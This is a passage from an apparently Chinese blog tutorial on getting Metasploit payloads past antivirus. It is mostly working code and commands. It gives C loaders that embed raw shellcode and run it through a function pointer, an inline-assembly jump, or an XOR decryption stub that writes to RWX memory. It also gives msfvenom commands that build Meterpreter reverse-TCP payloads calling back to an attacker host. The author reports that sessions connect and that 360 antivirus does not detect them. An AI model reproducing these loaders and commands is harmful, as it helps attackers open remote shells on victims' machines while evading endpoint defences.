class="string">&quot;\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11&quot;</span></span><br><span class="line"><span class="string">&quot;\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89&quot;</span></span><br><span class="line"><span class="string">&quot;\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23&quot;</span></span><br><span class="line"><span class="string">&quot;\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2&quot;</span></span><br><span class="line"><span class="string">&quot;\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6&quot;</span></span><br><span class="line"><span class="string">&quot;\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32&quot;</span></span><br><span class="line"><span class="string">&quot;\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04&quot;</span></span><br><span class="line"><span class="string">&quot;\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f&quot;</span></span><br><span class="line"><span class="string">&quot;\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93&quot;</span></span><br><span class="line"><span class="string">&quot;\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c&quot;</span></span><br><span class="line"><span class="string">&quot;\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8&quot;</span></span><br><span class="line"><span class="string">&quot;\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1&quot;</span></span><br><span class="line"><span class="string">&quot;\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15&quot;</span></span><br><span class="line"><span class="string">&quot;\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93&quot;</span></span><br><span class="line"><span class="string">&quot;\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c&quot;</span></span><br><span class="line"><span class="string">&quot;\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62&quot;</span></span><br><span class="line"><span class="string">&quot;\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b&quot;</span></span><br><span class="line"><span class="string">&quot;\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0&quot;</span></span><br><span class="line"><span class="string">&quot;\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c&quot;</span></span><br><span class="line"><span class="string">&quot;\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4&quot;</span></span><br><span class="line"><span class="string">&quot;\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41&quot;</span></span><br><span class="line"><span class="string">&quot;\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66&quot;</span></span><br><span class="line"><span class="string">&quot;\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a&quot;</span></span><br><span class="line"><span class="string">&quot;\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97&quot;</span></span><br><span class="line"><span class="string">&quot;\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b&quot;</span></span><br><span class="line"><span class="string">&quot;\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6&quot;</span></span><br><span class="line"><span class="string">&quot;\xbe\x89\x55\xf4\x30\x8a&quot;</span>;</span><br><span class="line"><span class="function">pragma <span class="title">comment</span><span class="params">(linker, <span class="string">&quot;/subsystem:\&quot;Windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;</span>)</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> ((<span class="keyword">void</span>(WINAPI*)(<span class="keyword">void</span>))&amp;buf)();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译生成exe</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221113953681.png" alt="image-20220221113953681"></p>
<p>静态没问题，执行被查杀</p>
<h3 id="汇编花指令"><a href="#汇编花指令" class="headerlink" title="汇编花指令"></a>汇编花指令</h3><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">pragma</span> comment(linker, <span class="meta-string">&quot;/section:.data,RWE&quot;</span>)</span></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> shellcode[] =</span><br><span class="line"><span class="string">&quot;\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1&quot;</span></span><br><span class="line"><span class="string">&quot;\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9&quot;</span></span><br><span class="line"><span class="string">&quot;\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b&quot;</span></span><br><span class="line"><span class="string">&quot;\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb&quot;</span></span><br><span class="line"><span class="string">&quot;\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2&quot;</span></span><br><span class="line"><span class="string">&quot;\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a&quot;</span></span><br><span class="line"><span class="string">&quot;\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed&quot;</span></span><br><span class="line"><span class="string">&quot;\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75&quot;</span></span><br><span class="line"><span class="string">&quot;\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11&quot;</span></span><br><span class="line"><span class="string">&quot;\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89&quot;</span></span><br><span class="line"><span class="string">&quot;\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23&quot;</span></span><br><span class="line"><span class="string">&quot;\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2&quot;</span></span><br><span class="line"><span class="string">&quot;\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6&quot;</span></span><br><span class="line"><span class="string">&quot;\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32&quot;</span></span><br><span class="line"><span class="string">&quot;\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04&quot;</span></span><br><span class="line"><span class="string">&quot;\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f&quot;</span></span><br><span class="line"><span class="string">&quot;\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93&quot;</span></span><br><span class="line"><span class="string">&quot;\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c&quot;</span></span><br><span class="line"><span class="string">&quot;\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8&quot;</span></span><br><span class="line"><span class="string">&quot;\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1&quot;</span></span><br><span class="line"><span class="string">&quot;\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15&quot;</span></span><br><span class="line"><span class="string">&quot;\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93&quot;</span></span><br><span class="line"><span class="string">&quot;\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c&quot;</span></span><br><span class="line"><span class="string">&quot;\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62&quot;</span></span><br><span class="line"><span class="string">&quot;\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b&quot;</span></span><br><span class="line"><span class="string">&quot;\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0&quot;</span></span><br><span class="line"><span class="string">&quot;\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c&quot;</span></span><br><span class="line"><span class="string">&quot;\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4&quot;</span></span><br><span class="line"><span class="string">&quot;\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41&quot;</span></span><br><span class="line"><span class="string">&quot;\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66&quot;</span></span><br><span class="line"><span class="string">&quot;\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a&quot;</span></span><br><span class="line"><span class="string">&quot;\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97&quot;</span></span><br><span class="line"><span class="string">&quot;\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b&quot;</span></span><br><span class="line"><span class="string">&quot;\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6&quot;</span></span><br><span class="line"><span class="string">&quot;\xbe\x89\x55\xf4\x30\x8a&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> __asm</span><br><span class="line"> &#123;</span><br><span class="line"> </span><br><span class="line"> mov eax, offset shellcode</span><br><span class="line"> _emit <span class="number">0xFF</span> </span><br><span class="line"> _emit <span class="number">0xE0</span></span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译生成exe</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221114336304.png" alt="image-20220221114336304"></p>
<p>msf正常上线</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221114327049.png" alt="image-20220221114327049"></p>
<p>360动态静态查杀均没查杀</p>
<h3 id="XOR加密"><a href="#XOR加密" class="headerlink" title="XOR加密"></a>XOR加密</h3><p>msfvenom生成raw格式shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b &#x27;\x00&#x27; lhost=192.168.221.128 lport=4444 -f raw &gt; shellcode.raw</span><br></pre></td></tr></table></figure>

<p>用<a href="https://github.com/Arno0x/ShellcodeWrapper">ShellcodeWrapper</a>进行加密</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python shellcode_encoder.py -cpp -cs -py shellcode.raw jasontt xor</span><br><span class="line">//key：jasontt</span><br></pre></td></tr></table></figure>

<p>生成C++、C#、python文件均可以用来攻击，css.exe执行C#等</p>
<p>C++代码如下</p>
<figure class="highlight c++"><table><tr><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">Author: Arno0x0x, Twitter: @Arno0x0x</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&quot;stdafx.h&quot;</span> <span class="comment">//编译报错此处删掉</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Encrypted shellcode and cipher key obtained from shellcode_encoder.py</span></span><br><span class="line">	<span class="keyword">char</span> encryptedShellcode[] = <span class="string">&quot;\xd5\xac\x20\x16\x16\xae\xbe\xb3\x15\x57\x9b\x34\x47\xbd\xdb\x1a\xf0\xad\x6a\x45\x0e\x65\x62\x09\xad\xdf\xf8\xd7\x68\x8d\x68\x1f\x20\x25\xa3\xdb\x7e\x69\xc7\xa1\x59\x41\x0f\x2d\x64\xd2\xd5\x59\xf6\xd7\xa4\xb7\xac\x28\x46\xe0\xc7\x34\xa6\xb5\x49\x3c\x3b\x16\x55\x76\x28\x11\x84\x15\x8c\x6e\xc1\x0e\x10\x08\x0b\x80\x60\x80\xdc\xe0\xcd\xe8\xa7\x18\x95\x12\xe2\xfa\xf2\xc1\x1f\x35\xb2\xaa\x3a\xe8\xd0\xad\x46\x2e\x0a\x09\xf6\xf4\x21\x10\x9b\xc8\x8a\x3e\x6e\xdd\x7e\x0a\x7f\x16\xc2\x9e\x0c\xe2\xa4\x77\xc5\x86\x90\x00\x8b\xb0\x42\x39\xa3\x7f\x37\x4f\x22\xc2\x1f\xba\x39\x31\xc1\xc4\xd2\x3b\xc0\x11\x91\xbe\xaa\x9b\x89\x45\xb2\x10\x3b\xca\x5b\x04\x3c\x2b\x4e\x13\x25\x29\xce\x88\x97\x0f\x64\x16\xfe\x62\x4c\x46\xd9\xe2\x81\x2a\x69\x33\x44\x8f\x48\x58\xac\x8c\x67\xe1\x94\x55\xbc\x14\x26\xa2\x77\xb8\x66\x5a\x9a\xbf\x10\xcc\x69\xa8\xe0\x6d\x53\xb1\x0f\xf7\xe9\x45\x24\x08\xf8\x0d\x88\x84\x86\x2f\xdc\x2b\xdf\x2d\x5e\xab\xac\xe9\x44\x11\x95\x4b\xdc\xff\x7d\xe1\x26\xa4\x6e\x58\x53\x5d\xb9\x15\xb5\xf5\xdd\x74\x8c\x01\xb3\x0b\x26\x43\xc4\xdf\x52\xbe\xbe\x78\xc2\xbc\xc0\x8c\xa5\x12\xb8\x47\x7c\x03\x60\x9d\xa0\x15\xad\xd7\x2a\xa6\xe2\x44\x4b\xb1\xd9\x13\x91\xc9\x65\x20\x27\x8e\x8a\xe3\x49\x5c\x06\x2c\xcc\x00\x63\x70\x9f\xa5\xab\xf1\x9c\x3d\xf1\xde\x5f\x85\xbb\x52\x67\xe7\x65\xaf\xd6\xec\xd0\xb4\x8d\x62\xcd\xe1\xc0\xc1\x60\xb1\x91\x1d\x82\x87\x64\xf6\xaf\x30\x54\x0a\xed\x8b\x06\x41\xdd\x54\x03\xf1\xc6\x2a\xb2\x57\xb8\xd7\x83\x4e\xd0\xab\xb3\x94\x00\x6d\xff\xe0\xc1\x52\x16\x7e\x66\x1a\xb0\xa8\x0b\x21\x0b\x03\x51\x14\x56\x30\x0c\xea\x89\x4b\x27\xbe\x30\xab\xc0\xe7\x8c\xba\x8c\xfd\x68\x77\x81\x4a\x99\x56\xa9\x07\xbe\x19\x9f\x21\xfd\xd3\xdb\xb2\xca\x36\xd3\x36\xaf\xcc\x4a\x18\xb4\xdc\x77\x01\xd7\x58\x55\xcf\xfa\xf4\x88\x82\xcc\xda\x88\x0b\x85\xe2\xcd\x46\x6a\x65\xe5\x7b\xe3\x38\x89\x1d\x40\xa3\x4e\x51\xd0\x8b\x96\x64\xfc\xfb\x68\x34\x1c\x80\x78\x68\x28\xc6\xc3\xc6\xa1\xa4\x62\xd4\xdb\x53\x26\xf2\x82\xd7\x40\xcb\xbd\x93\xfb\x79\xd0\x7a\xab\x99\x60\x02\xad\xe1\x18\xd4\x8c\x84\x68\xa2\xba\x34\x2c\x1b\xd3\x57\xe9\x9a\x79\x92\x87\xb5\x86\x2a\x0d\xc2\x17\x16\x83\x00&quot;</span>;</span><br><span class="line">	<span class="keyword">char</span> key[] = <span class="string">&quot;jasontt&quot;</span>;</span><br><span class="line">	<span class="keyword">char</span> cipherType[] = <span class="string">&quot;xor&quot;</span>;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Char array to host the deciphered shellcode</span></span><br><span class="line">	<span class="keyword">char</span> shellcode[<span class="keyword">sizeof</span> encryptedShellcode];	</span><br><span class="line">	</span><br><span class="line"></span><br><span class="line">	<span class="comment">// XOR decoding stub using the key defined above must be the same as the encoding key</span></span><br><span class="line">	<span class="keyword">int</span> j = <span class="number">0</span>;</span><br><span class="line">	<span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="keyword">sizeof</span> encryptedShellcode; i++) &#123;</span><br><span class="line">		<span class="keyword">if</span> (j == <span class="keyword">sizeof</span> key - <span class="number">1</span>) j = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">		shellcode[i] = encryptedShellcode[i] ^ key[j];</span><br><span class="line">		j++;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Allocating memory with EXECUTE writes</span></span><br><span class="line">	<span class="keyword">void</span> *exec = <span class="built_in">VirtualAlloc</span>(<span class="number">0</span>, <span class="keyword">sizeof</span> shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Copying deciphered shellcode into memory as a function</span></span><br><span class="line">	<span class="built_in">memcpy</span>(exec, shellcode, <span class="keyword">sizeof</span> shellcode);</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Call the shellcode</span></span><br><span class="line">	((<span class="built_in"><span class="keyword">void</span></span>(*)())exec)();</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>编译生成exe</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221151609401.png" alt="image-20220221151609401"></p>
<p>msf正常上线</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221151723462.png" alt="image-20220221151723462"></p>
<p>这里有个小插曲，中间去上课了，本来msf正常上线说明动静态查杀都过了，但是下课回来的时候发现已经被查杀了，出现这种情况说明之前的某些免杀效果可能也只是暂时的。</p>
<blockquote>
<p>Kali中运行ShellcodeWrapper可能出现的问题，解决方法如下：</p>
<p>问题：No module named Crypto.Hash</p>
<p>解决方法：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">pip uninstall pycrypto</span><br><span class="line">pip install pycryptodome</span><br></pre></td></tr></table></figure>
</blockquote>
<h3 id="Base64加密"><a href="#Base64加密" class="headerlink" title="Base64加密"></a>Base64加密</h3><p>msfvenom生成base64编码shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.221.128 lport=4444 -f c &gt; shell.c</span><br></pre></td></tr></table></figure>

<p>base64.c</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">/* Base64 encoder/decoder. Originally Apache file ap_base64.c</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&quot;base64.h&quot;</span></span></span><br><span class="line"><span class="comment">/* aaaack but it&#x27;s fast and const should make it shared text page. */</span></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span> pr2six[<span class="number">256</span>] =</span><br><span class="line">&#123;</span><br><span class="line">	<span class="comment">/* ASCII table */</span></span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">62</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">63</span>,</span><br><span class="line">	<span class="number">52</span>, <span class="number">53</span>, <span class="number">54</span>, <span class="number">55</span>, <span class="number">56</span>, <span class="number">57</span>, <span class="number">58</span>, <span class="number">59</span>, <span class="number">60</span>, <span class="number">61</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>, <span class="number">7</span>, <span class="number">8</span>, <span class="number">9</span>, <span class="number">10</span>, <span class="number">11</span>, <span class="number">12</span>, <span class="number">13</span>, <span class="number">14</span>,</span><br><span class="line">	<span class="number">15</span>, <span class="number">16</span>, <span class="number">17</span>, <span class="number">18</span>, <span class="number">19</span>, <span class="number">20</span>, <span class="number">21</span>, <span class="number">22</span>, <span class="number">23</span>, <span class="number">24</span>, <span class="number">25</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">26</span>, <span class="number">27</span>, <span class="number">28</span>, <span class="number">29</span>, <span class="number">30</span>, <span class="number">31</span>, <span class="number">32</span>, <span class="number">33</span>, <span class="number">34</span>, <span class="number">35</span>, <span class="number">36</span>, <span class="number">37</span>, <span class="number">38</span>, <span class="number">39</span>, <span class="number">40</span>,</span><br><span class="line">	<span class="number">41</span>, <span class="number">42</span>, <span class="number">43</span>, <span class="number">44</span>, <span class="number">45</span>, <span class="number">46</span>, <span class="number">47</span>, <span class="number">48</span>, <span class="number">49</span>, <span class="number">50</span>, <span class="number">51</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>,</span><br><span class="line">	<span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span>, <span class="number">64</span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">Base64decode_len</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span>* bufcoded)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> nbytesdecoded;</span><br><span class="line">	<span class="keyword">register</span> <span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span>* bufin;</span><br><span class="line">	<span class="keyword">register</span> <span class="keyword">int</span> nprbytes;</span><br><span class="line">	bufin = (<span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span>*)bufcoded;</span><br><span class="line">	<span class="keyword">while</span> (pr2six[*(bufin++)] &lt;= <span class="number">63</span>);</span><br><span class="line">	nprbytes = (bufin - (<span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span>*)bufcoded) - <span class="number">1</span>;</span><br><span class="line">	nbytesdecoded = ((nprbytes + <span class="number">3</span>) / <span class="number">4</span>) * <span class="number">3</span>;</span><br><span class="line">	<span class="keyword">return</span> nbytesdecoded + <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">Base64decode</span><span class="params">(<span class="keyword">char</span>* bufplain, <span class="keyword">const</span> <span class="keyword">char</span>* bufcoded)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> nbytesdecoded;</span><br><span class="line">	<span class="keyword">register</span> <span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span>* bufin;</span><br><span class="line">	<span class="keyword">register</span> <span class="keyword">unsigned</span> <span class="keyword">char</span>* bufout;</span><br><span class="line">	<span class="keyword">register</span> <span class="keyword">int</span> nprbytes;</span><br><span class="line">	bufin = (<span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span>*)bufcoded;</span><br><span class="line">	<span class="keyword">while</span> (pr2six[*(bufin++)] &lt;= <span class="number">63</span>);</span><br><span class="line">	nprbytes = (bufin - (<span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span>*)bufcoded) - <span class="number">1</span>;</span><br><span class="line">	nbytesdecoded = ((nprbytes + <span class="number">3</span>) / <span class="number">4</span>) * <span class="number">3</span>;</span><br><span class="line">	bufout = (<span class="keyword">unsigned</span> <span class="keyword">char</span>*)bufplain;</span><br><span class="line">	bufin = (<span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span>*)bufcoded;</span><br><span class="line">	<span class="keyword">while</span> (nprbytes &gt; <span class="number">4</span>) &#123;</span><br><span class="line">		*(bufout++) =</span><br><span class="line">			(<span class="keyword">unsigned</span> <span class="keyword">char</span>)(pr2six[*bufin] &lt;&lt; <span class="number">2</span> | pr2six[bufin[<span class="number">1</span>]] &gt;&gt; 